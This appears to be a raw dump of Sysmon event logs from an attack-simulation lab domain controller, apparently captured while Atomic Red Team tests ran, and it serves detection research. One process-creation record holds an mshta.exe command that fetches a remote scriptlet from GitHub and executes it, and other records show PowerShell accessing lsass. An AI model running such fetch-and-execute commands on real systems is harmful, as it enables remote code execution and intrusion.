16:56:28.420{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b09be|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.420{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014868C:\Windows\explorer.exe{05ADC7E1-6E39-603E-FCAA-00000000AD01}13840C:\Windows\SYSTEM32\Notepad.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+aef34|C:\Windows\System32\SHELL32.dll+b0987|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002244216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.373{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.373{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30CE01139B733B2B2EA4FEC0CB39C41,SHA256=28386D3CFE9246AE24F43800FB9F088A32BC23A4E56BDD2DF211E444C668DC17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002244214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.904{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60192-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 354300x80000000000000002244213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:17.903{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\System32\dfssvc.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local60192-truefe80:0:0:0:6167:9038:1edc:47d4win-dc-974.attackrange.local389ldap 10341000x80000000000000002244212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.108{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.108{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.045{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.045{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002244208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:56:28.035{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296\PSHost.132591777879344133.6296.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000002244207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.014{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_fdjecvct.23f.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002244206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:28.014{05ADC7E1-6E3B-603E-FEAA-00000000AD01}6296ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_nphdjf2c.np2.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245101Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6CB1-603E-35AA-00000000AD01}148289956C:\Windows\system32\conhost.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245100Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF829F94433) 10341000x80000000000000002245099Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245098Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245097Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245096Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-229F-6039-0C00-00000000AD01}58812140C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002245095Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-29F0-6039-C005-00000000AD01}49443952C:\Windows\system32\csrss.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002245094Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6CB1-603E-34AA-00000000AD01}1169612080C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+fffcffed(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f535de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4ac19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6ff65392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f474997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4d2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4b635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4a82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+6f4e1471(wow64) 154100x80000000000000002245093Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.987{05ADC7E1-6E3D-603E-03AB-00000000AD01}6688C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002245092Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-02 16:56:11.776 11241100x80000000000000002245091Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.983{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-02 16:56:11.773 23542300x80000000000000002245090Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.940{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-err.txtMD5=8E5B813F7318ECA1918FA506C987D4CE,SHA256=67B589F6742983588ED2E963D0D8E0CA47D39542CB8C3A4594AEE8E848BD0D10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002245089Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.845{05ADC7E1-6E3D-603E-02AB-00000000AD01}8280ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245088Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.734{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245087Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.734{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245086Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245085Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.733{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245084Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 